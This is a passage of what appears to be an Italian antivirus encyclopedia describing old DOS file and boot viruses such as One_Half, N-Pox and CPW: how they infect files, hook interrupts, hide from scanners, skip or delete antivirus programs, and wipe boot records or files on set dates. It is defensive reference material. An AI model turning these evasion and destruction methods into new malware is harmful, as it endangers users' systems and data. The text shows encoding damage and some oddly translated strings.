decriptato si trovano i seguenti messaggi: "Dis is one half." "Press any key to continue" "Did you Leave the room?" [One_Half.3570] Nome del Virus: ONEH3570 Pseudonimo: ONE-HALF.3570 Lunghezza del virus: 3500-5500 Byte Tipo di Virus: Virus Polimorfico Sintomi : La lunghezza dei file con estensione *.COM e *.EXE infetti aumenta di 3570 Byte e la memoria disponibile diminuisce di 5120 Byte. A causa della procedura del virus, i programmi eseguiti possono rallentare. Note: One-half.3570 Φ un virus multipartito e polimorfico ed Φ una nuova versione di One-Half.3544. Prima infetta il settore di boot dell'hard disk e rimane in memoria solo se l'hard disk Φ usato per l'avvio. Durante questa procedura, colloca 5120 Byte in memoria e rimane in memoria alta. Intercetta l'INT 21, INT 13, e INT 1C. Tutti i file con estensione *.EXE e *.COM eseguiti, aperti o copiati vengono infettati dal virus. La loro lunghezza aumenta di 3570 Byte. Il virus Φ in grado di nascondersi da un software anti-virus. Riesce anche a nascondere l'aumento di lunghezza dei file aggiungendo dei codici speciali in grado di controllare i file infetti e modificare la loro lunghezza quando vengono visti. One-Half cripta un area dell'hard disk ogni volta che viene fatto partire. Ci≥ significa che lentamente cripta tutti i dati nell'hard disk. Malgrado queste aree vengano poi decriptate quando il virus Φ in memoria, Φ opportuno eseguire una copia di backup di un file importante mentre il virus Φ ancora in memoria. Questo rende difficile la sua rimozione perchΘ nasconde il suo codice criptato nel Boot Record. Nel codice del virus vengono decriptati i seguenti messaggi: "Dis is one half." "Press a key" "Did you leave the room?" [Unsnared] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 814 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: 1) Si carica in memoria alta, collocando 1024 Byte (9FC0:0000). 2) Sposta circa 814 Byte (032EH) in memoria alta. 3) Infetta i file con estensione *.EXE. Copia il codice del virus nel programma ospite, aggiungendo circa 814 (032EH) Byte. Carica il virus prima di far girare il programma ospite. 4) Mentre Φ in memoria, il virus infetta tutti i file con estensione *.EXE aperti. Prima di infettare i file, il virus aggiunge spazio in memoria. Non si verifica niente di nuovo in quanto attacca il suo codice nel file ospite dopo che si Φ caricato in memoria. Danni: 1) Diminuzione della memoria libera. 2) Aumento della lunghezza dei file. [Ant4096B] Nome del Virus: ANT4096B Tipo di Virus: Virus da File ((File con estensione *.EXE e *.COM) Lunghezza del Virus: 4096 Byte Nome originale: INVADER Virus reinfettante: No Tipo di memoria: residente in memoria, tipo MCB Vettore PC agganciato: INT 21h, INT 8h, INT 9h, INT 13h Metodo di infezione: Il virus infetta i file con estensione *.EXE e *.COM. Infetta i file con estensione *.COM spostando pi∙ in basso il programma ospite e attaccando l'intero virus all'inizio del file. Nell'infezione dei file con estensione *.EXE invece, il programma del virus viene attaccato normalmente o alla fine del programma ospite. Dopo l'infezione, la lunghezza del file del programma ospite aumenta di 4096 Byte . Il programma del virus colloca 320 paragrafi (5120 Byte) nella parte bassa della memoria, dopo COMMAND.COM, specificatamente in 17F8:0000. Decripta 424 Byte del suo programma usando XOR 46H. In seguito, nell'area dei dati del programma del virus si pu≥ vedere la stringa: "by Invader, Feng Chiu U., Warning: Don't run ACAD.EXE". Intercetta poi l'INT 21H cambiando i suoi vettori a 1808:05DF, INT 08H a 1808:01F9, INT 09H a 1808:02B8, e INT 13H a 1808:0435. Nell'intercettazione dell'interupt non si vede nessuna procedura. Il virus infetta solo i file caricati ed eseguiti. Sintomi: I file infetti incrementano le loro dimensioni di 4096 Byte. [Ontario-B] Pseudonimo: Origine: Lunghezza del virus: 1024 Byte Tipo di Virus: Sintomi : I programmi con estensione *.COM e *.EXE aumentano di 1024 Byte e la memoria libera diminuisce di 2048 Byte. Note: Alla prima infezione, il virus colloca 2048 Byte in memoria alta e quindi vi trasferisce 1024 Byte del suo codice. Intercetta l'INT 21 con la procedura di infezione ai servizi 4B00 (Execute Program), 3D02 (Open File Handle), 11 e 12 (Find Directory Entries). Il virus infetta i file con estensione *.COM e *.EXE aperti, rinominati o eseguiti. Nasconde inoltre i file infetti quando visti o elencati con il comando DIR. Non sembra vi siano danni a parte la replicazione del virus. [Nov_17] Pseudonimo: November-17th.800 Lunghezza del virus: 800 Tipo di Virus: Virus da file Sintomi : I file con estensione *.EXE aumentano di 800 Byte e vengono collocati 832 Byte in memoria alta. Note: All'infezione, il virus controlla che il file trasportatore sia un file con estensione *.EXE. Infetta i file con estensione *.COM e *.EXE in modo diverso a causa della loro diversa struttura. Colloca quindi 832 Byte in memoria alta e sposta il suo codice in HMA. Intercetta quindi l'INT 21. Torna quindi alla routine originale. Una volta in memoria, il virus oltre ad infettare i file, cambia gli attributi dei file aperti o eseguiti. Al caricamento, NO-17-800 controlla che la data di sistema sia tra i giorni 17 e 30 novembre; Se "SI", la salva e la controlla finchΘ non viene cambiata; ci≥ si verifica quando scrive 8 settori del drive in uso partendo dal primo 1. Questa procedura distrugge il Boot Record ed i file situati nei primi 8 settori del floppy disk oppure il Boot Record e la tabella di locazione dei file dell'hard disk a seconda del drive di default del sistema. Nel codice del virus si trova il seguente testo: "SCAN.CLEAN.COMEXE" [Nov_17th.855.A] Pseudonimo: NOVEMBER 17-855 Lunghezza del virus: 855 Byte Tipo di Virus: Virus da file Sintomi : La lunghezza dei file con estensione *.COM e *.EXE aumenta di 855 Byte e sono collocati 896 Byte in memoria alta. Note: Alla prima infezione, il virus controlla che il file trasportatore sia un file con estensione *.EXE. Infetta i file con estensione *.COM e *.EXE in modo diverso a causa della loro diversitα di struttura. Colloca quindi 896 Byte in memoria alta e sposta il suo codice in HMA. Intercetta poi l'INT 9 e l'INT 21. Torna quindi alla routine originale. Una volta in memoria, il virus oltre ad infettare i file, cambia gli attributi dei file aperti o eseguiti. Questa Φ una nuova versione del virus NO17-800. Differisce dal precedente in quanto si attiva premendo dei tasti e non all'orario prestabilito. Quando viene premuto un certo numero di tasti e la data di sistema Φ tra i giorni 17-30 novembre, il virus scrive 8 settori del drive di default partendo dal primo. Questo distrugge il Boot Record ed i file situati nei primi 8 settori del floppy disk oppure distrugge il Boot Record ed la tabella di locazione dei file dell'hard disk a seconda del drive di default del sistema. Nel codice del virus si trova il seguente testo: "SCAN.CLEAN.COMEXE" [No_Frills.Dudley] Lunghezza del virus: 1215 Tipo di Virus: Virus da file; Virus criptato Sintomi : Aumenta la lunghezza dei file con estensione *.EXE e *.COM di 1215 Byte e colloca 4624 Byte in memoria alta. Note: La prima volta che viene caricato, NOFDUDLY decripta il suo codice di 1153 Byte. Controlla poi che sia giα in memoria. Se "NO", colloca 4624 Byte in memoria alta. Quindi trasferisce tutto il suo codice di 1215 Byte in memoria alta. Intercetta l'INT 21, aggiungendo codici extra al servizio 54 (Get Verify Flag), 4B00 (Execute Program), 3D (Open File Handle), 56 (Rename File), e 6C (Extended Open/Create). Quindi ritorna alla routine originale. Quando Φ in memoria, NOFDUDLY intercetta temporaneamente l'INT 24 (Critical Error Handler) in modo da leggere la soluzione di problemi se si verifica un errore, poi lo sgancia. Quindi infetta il COMMAND.COM del drive in uso. Questo virus Φ una versione migliore del virus NOFRILLS in quanto Φ dotato di un miglior metodo di criptazione. Nel codice del virus si trova il seguente testo: "[Oi Dudley] [PRegno UnitoE]" [No_Frills.843] Pseudonimo: NO FRILLS Origine: Lunghezza del virus: 843 Tipo di Virus: Virus da file Sintomi : La lunghezza dei file con estensione *.EXE e *.COM aumenta di 843 Byte e colloca 1536 Byte in memoria alta. Dati: Il virus controlla che il file trasportatore sia con estensione *.COM o *.EXE in modo da sapere quale codice sarα trasferito in memoria alta. Individua quindi 1536 Byte di memoria alta e vi trasferisce 400h del suo codice. Intercetta poi l'INT 21 aggiungendo codici extra al servizio 54 (Get Verify Flag), 4B00 (Execute Program), 3D (Open File Handle), 43 (Get/Set File Attributes) e 6C (Extended Open/Create). Torna quindi alla routine originale. Quando Φ in memoria, NOFRILLS intercetta temporaneamente l'INT 24 (Critical Error Handler) in modo da leggere la soluzione di problemi se si verifica un errore, poi lo sgancia. Quindi infetta il COMMAND.COM del drive in uso. Nel codice del virus si trova in seguente messaggio: "+-No Frills 2.0 by Harry McBungus-+" [Nomenklatura] Virus Status: Origine: Lunghezza del virus: 1024 Byte Tipo di Virus: Sintomi : Aumento della lunghezza dei file con estensione *.COM e *.EXE di 1024 Byte e diminuzione della memoria disponibile di 1072 Byte. Compare un errore di lettura/scrittura del disco come "Sector not found" o "Invalid Media Type". Note: Il virus NOMENKLATURA Φ molto simile ai comuni virus da file. La differenza Φ che utilizza il servizio 13 dell'INT 2F (Set Disk Interrupt Handler) che Φ pi∙ che altro una procedura "error-trapping" del virus quando Φ impossibile l'infezione di altri file. E' simile ad altri virus in quanto prima si colloca nell'area di memoria alta della lunghezza di 1072 Byte, quindi vi trasferisce i suoi 1055 Byte. I Byte extra caricati dal virus sono gli indirizzi di locazioni specifiche nel sistema operativo, in modo da accedervi direttamente, e i vettori interrupt di INT 21 e INT 13. Controlla inoltre che un file eseguito sia infetto e sia un file con estensione *.COM o *.EXE. I file eseguibili che vengono aperti e/o eseguiti vengono immediatamente infettati dal virus. Questo virus fu chiamato cos∞ a causa della stringa di testo trovata nel suo codice: "NOMENKLATURA" [Cordobes.3334] Tipo di Virus: Polimorfico, Virus da file (File con estensione *.EXE) Lunghezza del Virus: 3333 Byte Virus reinfettante: no Tipo di memoria: risiede in memoria, tipo MCB Vettore PC agganciato: INT 21h Metodo di infezione: Il virus infetta solo i file con estensione *.EXE. Infetta il file ospite attaccandosi alla fine del file. Essendo un virus polimorfico, decripta prima il suo codice, facendolo in modo complesso. Il virus colloca 4,128 Byte in memoria bassa partendo da 1806:0000 e vi copia il suo programma di 3,333 Byte per restare in memoria. Intercetta poi l'INT 21H impostando il valore del suo programma in memoria bassa a 1816:0BAB. Utilizza questo interrupt per attaccarsi ai FILE con estensione *.EXE caricati ed eseguiti. Una volta attivato, il virus controlla mese e giorno corrente. Se Φ il giorno 10 agosto il virus infetta i file. Oltre ad infettare i file con estensione *.EXE, il virus cerca AUTOEXEC.BAT in drive C:\ e mostra: @Echo Virus "EL MOSTRO CORDOBES" @Echo No tema por sus datos. Que pase un buen @Echo. @Pause In questo modo all'avvio del sistema in drive C:\ compare il testo e si ferma fino a quando non viene premuto un tasto. La stessa stringa si pu≥ vedere nel codice del virus. A volte il virus non pu≥ attaccarsi completamente ai file con estensione *.EXE quindi l'aumento di lunghezza del file ospite dopo l'infezione non Φ ben definito e non rimane in memoria. Il file alterato non completa il suo caricamento e compare un messaggio d'errore. Danni: Altera i file con estensione *.EXE. Sintomi: Aggiunta al file AUTOEXEC.BAT in drive C:\ del suddetto testo. [Jos] Tipo di Virus: Virus da file Virus Infect Type: MBR Vettore PC agganciato: Metodo di infezione: 1) Sposta 21CDh in DS:[FE], 14EBh in DS:[100] e 17h in DS:[11E]. 2) Carica/esegue un programma avendo il controllo del blocco = 114C:11E ed e la linea di comando ASCIIZ = 114C:0. Questa procedura non ha successo. "Beware the Jabberwock, my son!" "The jaws that bite, the claw that catch!" "And hast thou slain the Jabberwock!" "Come to my arms, my beamish boy!" 4) Cicli FFFFh al valore di CX (solo un rallentamento). 5) Esegue questi codici: MOV GS,DX CLI CLD IN AL,64 TEST AL,04 JNZ D840 D840: SMSW AX TEST AL,01 JZ D84F CLI MOV AL,FE OUT 64,AL Dopo averli eseguiti la macchina esegue un warm boot. Sintomi: Si pu≥ vedere un messaggio all'indirizzo = 114C:0239h "JABBERW OCKY (.) the first Romanian Political Virussian Dhohoho$ Released Date 12-22-1990" [Npox.963.A] Pseudonimo: EVIL GENIUS 2.0 Origine: Lunghezza del virus: 963 Byte Tipo di Virus: Sintomi : Aumenta la lunghezza dei file con estensione *.COM e *.EXE di 963 Byte e diminuisce la memoria disponibile di 1024 Byte. Quando si trova in un dischetto protetto da scrittura, compare il messaggio "Write Protect Error" quando si cerca di leggerlo. Note: Alla prima infezione, il virus colloca 1024 Byte in memoria alta e quindi trasferisce il suo codice in HMA. In seguito, intercetta l'INT 21 e INT 9 poi ritorna alla routine originale. Nel codice del virus si pu≥ trovare il seguente testo: "Evil Genius V2.0 - RS/NRegno UnitoE" "C:\COMMAND.COM" Infetta i file con estensione *.COM e *.EXE caricati, eseguiti o aperti da altri file. Durante l'infezione, l'ora e data dei file non cambia ad eccezione del campo dei secondi che viene set a :58. Questo rappresenta anche la firma del virus nel caso che un file sia giα infetto. Prima di infettare i file, controlla che il file sia eseguito da un altro programma (es. rilevazione e correzione degli errori, anti-virus). Se "SI", controlla che il file caricato possieda: 1.) ****prot.*** (es. f-prot, nprot, lprot) 2.) ****scan.*** (es. pcscan, scan, viruscan) 3.) ****lean.*** (es. clean) Se queste caratteristiche non vengono soddisfatte, infetterα il programma eseguito. Una volta in memoria, il virus N-Pox nasconde l'aumento di lunghezza dei programmi infetti quando l'utente cerca di visualizzarlo (i.e., DIR). Modifica inoltre i file infetti caricati in memoria in modo da nasconderli da un software anti-virus. Il danno che N-Pox provoca consiste in una formattazione delle prime 32 tracce dell'hard disk, partendo dalla traccia 0, ogni volta che la data di sistema Φ il giorno 24 di ogni mese e viene premuto un tasto. Questo danneggia Boot Record, Tabella di allocazione dei file (FAT) ed i file di sistema nell'hard disk. [Cpw.1527] Tipo di Virus: Polimorfico, Virus da file (File con estensione *.COM e *.EXE) Lunghezza del Virus: 1527 Byte Virus reinfettante: No Data di rilevazione: 1992 Tipo di memoria: Memoria alta Luogo d'origine: Cile Vettore PC agganciato: INT 21h Metodo di infezione: Il virus infetta i file con estensione *.COM e *.EXE. Infetta il file ospite attaccandosi alla fine del file. La lunghezza di un file infetto aumenta di 1,527 Byte. Il virus rimane in memoria all'esecuzione di un file infetto. Essendo un virus polimorfico, decripta il suo codice. Quindi colloca 1,984 Byte in memoria alta partendo da 9F84:0000. Intercetta l'INT 21H per impostare il suo programma in memoria alta in 9F84:0258 in modo da attaccarsi ai file con estensione *.COM e *.EXE caricati, alla loro apertura. Prima di infettare un file caricato eseguibile, cancella, se esiste, il file anti-virus Infetta quindi COMMAND.COM in drive C:\ attaccandosi al file. Infine infetta il file eseguibile. Durante l'infezione, il virus controlla mese, giorno ed ora corrente. Se la data corrente Φ 11 settembre o 28 dicembre, controlla l'ora corrente. La procedura si attiva alle seguenti ore del giorno: ora 0.......(12:00) ora 1 ore 4 ore 6 ore 7 ore 10 ore 11 ore 13 ore 16 ore 18 ore 19 ore 21 La procedura cancella la prima sezione di file nella directory corrente fino a quando cancella il file caricato corrente. Anche se il file corrente caricato che attiva il virus viene cancellato, il virus resta comunque in memoria e continua la sua procedura. La cancellazione si verifica ogni volta che viene caricato un file eseguibile, dato che il virus Φ giα in memoria. Non tutti i file con estensione *.COM vengono infettati dal virus ma soltanto quelli di notevole lunghezza. Come controllato da DOS CHKDSK, il virus occupa 1,792 Byte di memoria o diminuisce la memoria disponibile dello stesso numero di Byte. Nel codice del virus si pu≥ trovare il seguente testo: "CPW fue becho en Chile en 1992," "VIVA CHILE MIERDA!" [DR&ET] Tipo di Virus: